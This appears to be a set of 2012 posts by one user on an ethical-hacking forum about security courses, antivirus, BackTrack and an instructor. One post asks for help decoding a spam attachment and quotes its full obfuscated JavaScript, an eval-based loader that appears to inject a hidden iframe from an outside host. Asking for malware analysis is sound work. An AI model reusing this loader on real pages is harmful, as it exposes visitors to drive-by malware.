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Ethical Hacking Discussions and Related Certifications / Programming / SecurityTube Python Scripting Expert
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on: March 29, 2012, 02:17:51 PM
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There's been a few topics here regarding python and infosec and it looks like Vivek has an answer to those threads: SecurityTube Python Scripting ExpertThe syllabus looks promising. The site says the course is for people with no programming skills to those with prior experience with the language. His past 2 certs (SWSE and SMFE) have had their course videos up on securitytube.net, but it looks like he may be doing something a little different with this cert: The pricing includes the full course material videos... I've posed the question on Twitter regardless  I really like Vivek's vids, teaching style, etc, so I'm definitely keeping this course on my radar!
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Ethical Hacking Discussions and Related Certifications / Malware / Anti-virus: waste of money?
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on: March 07, 2012, 01:52:33 AM
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http://www.wired.com/wiredenterprise/2012/03/antivirusWired released an article a few days ago regarding anti-virus and its usefulness. In it, a few infosec guys said they don't use it. Since then, there's been a lot of chatter in my Twitter feed about it and it seems to have shifted from the perspective of an infosec person using it or not, to the perspective of whether or not to use it in an enterprise. I've seen a lot of arguments... Using it: - Pros: It does stop some malware - Cons: It doesn't stop everything Not using it: - Cons: Machine is completely vulnerable, doesn't even have the benefits of the vendor definitions that will block some malware. - Pros - ...? Most of the arguments for not using it seem to be playing devils advocate and are looking for data to prove one way or the other. But one thing I've noticed is that I haven't seen is a "pro" argument for not using it, and the only thing I can think of is that you gain some CPU cycles back. I remember awhile back when AV really used to bog down a machine depending on the vendor, but it's gotten a lot better since then and can run quite idle in the background. Am I missing something else?
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Ethical Hacking Discussions and Related Certifications / Programming / Looking for Javascript coder to decode spam HTML attachment
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on: March 05, 2012, 05:23:07 PM
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I received a spam message with an HTML attachment. I downloaded the attachment and opened it in Notepad++ and found it contains Javascript. I know a little Javascript, but not nearly enough to work out what's going on here. I was wondering if anybody well versed in Javascript could decode this for me. I'm really curious what this is trying to to do  <script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa) f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q-6q81q67q62q78q66q23q1q11q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);} if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>
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Resources / Tools / Re: Backtrack 5 R2
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on: March 01, 2012, 02:29:16 AM
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great! i'm waiting for the image, cause upgrading seems to mess up the vertualbox guest additions because of the new kernel, and somehow i cant seem to get the additions to install for the new kernel...
Same problem here  Torrents are out later today though!
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Ethical Hacking Discussions and Related Certifications / Programming / Re: Joe McCray Python for Security Professionals
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on: February 29, 2012, 05:24:17 PM
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I haven't heard anything else about it. I've tried to converse with Joe a few times via email, he's not very responsive at all. I did get a couple replies after I took a different class he did, but he was supposed to get back to me about resolving the issue with the labs that most everybody in the class was having problems with, but he never did.
While he may do some classes on topics I'm very interested in, the lack of response/support has me hesitant on paying for anymore and looking to spend my money elsewhere.
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